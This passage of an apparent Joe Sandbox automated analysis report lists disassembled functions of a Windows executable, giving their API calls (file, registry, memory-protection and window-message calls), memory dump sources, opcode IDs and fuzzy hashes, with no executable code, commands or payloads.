                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: File$AttributesCreate
                                                        • String ID:
                                                        • API String ID: 415043291-0
                                                        • Opcode ID: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                                        • Instruction ID: 9d50a09f5748d4f60ef03139cc16a9656d1073ae209d3065c053d14625e31d4c
                                                        • Opcode Fuzzy Hash: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                                        • Instruction Fuzzy Hash: 87D09E31654301AFEF098F20DE16F2EBAA2EB84B00F11552CB682941E0DA715819DB15
                                                        Function 00405B25 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateDirectoryW.KERNELBASE(?,00000000,00403545,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040383C,?,00000008,0000000A,0000000C), ref: 00405B2B
                                                        • GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405B39
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: CreateDirectoryErrorLast
                                                        • String ID:
                                                        • API String ID: 1375471231-0
                                                        • Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                                        • Instruction ID: 2532c664264170c07cbc731aa09703a23e3881c092aaf3b019fc47175ec23a7b
                                                        • Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                                        • Instruction Fuzzy Hash: 98C04C70604906DAD7505F219F087177960AB50741F158439A6C7F40A0DA74A455D92D
                                                        Function 73B02B98 Relevance: 1.6, APIs: 1, Instructions: 143fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileA.KERNELBASE(00000000), ref: 73B02C57
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1569059369.0000000073B01000.00000020.00000001.01000000.00000004.sdmp, Offset: 73B00000, based on PE: true
                                                        • Associated: 00000000.00000002.1568940355.0000000073B00000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000000.00000002.1569611314.0000000073B04000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000000.00000002.1569637966.0000000073B06000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73b00000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 1154586761da4ff530967cbc4c91104ae9bfd54816eee0871d947a55bf6c1222
                                                        • Instruction ID: 60aef688151944b77b5611006d932fbc885853a3e5776970ea50ec20a38539fd
                                                        • Opcode Fuzzy Hash: 1154586761da4ff530967cbc4c91104ae9bfd54816eee0871d947a55bf6c1222
                                                        • Instruction Fuzzy Hash: 914182F250430CEFEB25AF65DBC4B5D3B79EB54318F308436E8099F950E63598888B91
                                                        Function 004016A0 Relevance: 1.5, APIs: 1, Instructions: 38fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • MoveFileW.KERNEL32(00000000,00000000), ref: 004016BB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: FileMove
                                                        • String ID:
                                                        • API String ID: 3562171763-0
                                                        • Opcode ID: 28dc5c50ebc12032345a7729cf35481b8c8bbd71f25d5d2fe63a1407a727cbb2
                                                        • Instruction ID: b5cd7fb0f8cac405fb011e9cf8ea0a60cc8dc6b6af2237c550085c2a5a912803
                                                        • Opcode Fuzzy Hash: 28dc5c50ebc12032345a7729cf35481b8c8bbd71f25d5d2fe63a1407a727cbb2
                                                        • Instruction Fuzzy Hash: 1DF0903160812293CB1077B55F0ED9F26A49F8137CB21063FB112B21E1D6BCC902926E
                                                        Function 004028B6 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004028D4
                                                          • Part of subcall function 004064BE: wsprintfW.USER32 ref: 004064CB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: FilePointerwsprintf
                                                        • String ID:
                                                        • API String ID: 327478801-0
                                                        • Opcode ID: 0f8cdb930f0e9c051f1287ec62565a86da269e9ff4fc99f02ffc866b5b181b8c
                                                        • Instruction ID: c79ba5cb2d88364bafa4f5c49a43b48020d8ed27846d342f9c81a2b2dcc73f01
                                                        • Opcode Fuzzy Hash: 0f8cdb930f0e9c051f1287ec62565a86da269e9ff4fc99f02ffc866b5b181b8c
                                                        • Instruction Fuzzy Hash: 9BE06D71904104ABDB00ABA5AE498FE73B9EB80355B20443FF101B04D4C77858109A2D
                                                        Function 00406412 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E7C,00000000,?,?), ref: 0040643B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: Create
                                                        • String ID:
                                                        • API String ID: 2289755597-0
                                                        • Opcode ID: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                                        • Instruction ID: 173efcb61436e01de2ec3b268cd8b302251cd5bc368a703a1804e99dfb897165
                                                        • Opcode Fuzzy Hash: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                                        • Instruction Fuzzy Hash: 51E0BF72010109BFEF095F60DD4AD7B3A1DE708610B11852EF906D5051E6B5A9705675
                                                        Function 00406119 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034BD,00000000,0041EA20,000000FF,0041EA20,000000FF,000000FF,00000004,00000000), ref: 0040612D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: FileWrite
                                                        • String ID:
                                                        • API String ID: 3934441357-0
                                                        • Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                        • Instruction ID: 5447fabf40714e60d37a3b8d529c829a5aab84dab7567664cea5a9789522ebfd
                                                        • Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                        • Instruction Fuzzy Hash: DFE08C3221021ABBDF109E518C00EEB3B6CEB003A0F014432FD26E7050D630E86097A4
                                                        Function 004060EA Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403507,00000000,00000000,0040332B,000000FF,00000004,00000000,00000000,00000000), ref: 004060FE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        • Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                        • Instruction ID: 2902185137110ca2ffdb2282e3c832ce644deeff7f1201e2b4f2572205eed693
                                                        • Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                        • Instruction Fuzzy Hash: D0E08C3221021AABCF109E508C01EEB3BACFF043A0F014432FD12EB042D230E9229BA4
                                                        Function 73B02A7F Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • VirtualProtect.KERNELBASE(73B0505C,00000004,00000040,73B0504C), ref: 73B02A9D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1569059369.0000000073B01000.00000020.00000001.01000000.00000004.sdmp, Offset: 73B00000, based on PE: true
                                                        • Associated: 00000000.00000002.1568940355.0000000073B00000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000000.00000002.1569611314.0000000073B04000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000000.00000002.1569637966.0000000073B06000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73b00000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: ProtectVirtual
                                                        • String ID:
                                                        • API String ID: 544645111-0
                                                        • Opcode ID: f4b2d827fd437fd3b0a38c4d3cdf230342a6fe5f054660b2e062a59b43d6057d
                                                        • Instruction ID: b5d7903ad1af9ce667ac863fee8e86c265d03bb468dcaa501a588e57e5c7eb55
                                                        • Opcode Fuzzy Hash: f4b2d827fd437fd3b0a38c4d3cdf230342a6fe5f054660b2e062a59b43d6057d
                                                        • Instruction Fuzzy Hash: 59F07FF2509280DED360EB2A878470E3FE4B728209B24A52BA19CDBE41F33454448F91
                                                        Function 00402419 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040244A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: PrivateProfileString
                                                        • String ID:
                                                        • API String ID: 1096422788-0
                                                        • Opcode ID: 979b3f2ec0bc23d324c76cc3db4c1f8da93b0e1d0eaca7bbe8bd823efade59bd
                                                        • Instruction ID: 53345aa50f94a5dbc05c73a67e8aa0b188b477950ab0ef6c1fe412bbc790425e
                                                        • Opcode Fuzzy Hash: 979b3f2ec0bc23d324c76cc3db4c1f8da93b0e1d0eaca7bbe8bd823efade59bd
                                                        • Instruction Fuzzy Hash: E7E04F3180021AAADB00AFA0CE0ADAD3678AF00304F10493EF510BB0D1E7F889509759
                                                        Function 004063E4 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000000,?,00406472,?,?,?,?,Call,?,00000000), ref: 00406408
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: Open
                                                        • String ID:
                                                        • API String ID: 71445658-0
                                                        • Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                        • Instruction ID: 12ce3b422fe6a0da393528f22193a7488631f194d1dbc4d2354a9349d97d7052
                                                        • Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                        • Instruction Fuzzy Hash: 34D0123204020DBBEF115F90DD01FAB3B1DEB08310F018836FE06A4091D776D570A758
                                                        Function 004015C8 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015D3
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: AttributesFile
                                                        • String ID:
                                                        • API String ID: 3188754299-0
                                                        • Opcode ID: fc4ae7de1a988c572ae2e9f733057e11b5d74982a37415ce069d5c91d6d923cf
                                                        • Instruction ID: cd4f68ad1bc4df61111a8e6125a37bec327b368bc2224c93a9ffc6bdd58994c4
                                                        • Opcode Fuzzy Hash: fc4ae7de1a988c572ae2e9f733057e11b5d74982a37415ce069d5c91d6d923cf
                                                        • Instruction Fuzzy Hash: 74D05B72B08101D7DB00DBE89B49A9E77A4DB50378B31853BD111F11D4D7B8C545A71D
                                                        Function 00404542 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404554
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        • Opcode ID: 8dc2ea4a8cffd810c80330d43262312fa0f844130cc7d84a637c392e617d0b66
                                                        • Instruction ID: 6ad8b1d984edffd0e08e34c6f36dd165e1dcb54a73607e2b540eae92d4c67d50
                                                        • Opcode Fuzzy Hash: 8dc2ea4a8cffd810c80330d43262312fa0f844130cc7d84a637c392e617d0b66
                                                        • Instruction Fuzzy Hash: ACC04C717402007BDA209F549D49F1777546790702F1495397351E51E0C674E550D61C
                                                        Function 0040350A Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403267,?), ref: 00403518
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: FilePointer
                                                        • String ID:
                                                        • API String ID: 973152223-0
                                                        • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                        • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                                                        • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                        • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                                        Function 0040452B Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(00000028,?,00000001,00404356), ref: 00404539
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        • Opcode ID: 5e23afa4ba150cac51e31494d2c9f0ee7f8efb4361c8cf2b7a73957f204a5961
                                                        • Instruction ID: 777369a795cbaa9bd4fd16da76cbada5404ff361b75e364c58eeef3f96c31ac9
                                                        • Opcode Fuzzy Hash: 5e23afa4ba150cac51e31494d2c9f0ee7f8efb4361c8cf2b7a73957f204a5961
                                                        • Instruction Fuzzy Hash: 6BB09235181600AADA115B40DE09F867BA2E7A4701F029438B340640B0CBB210A0DB08
                                                        Function 00405B9D Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                        Download Yara Rule
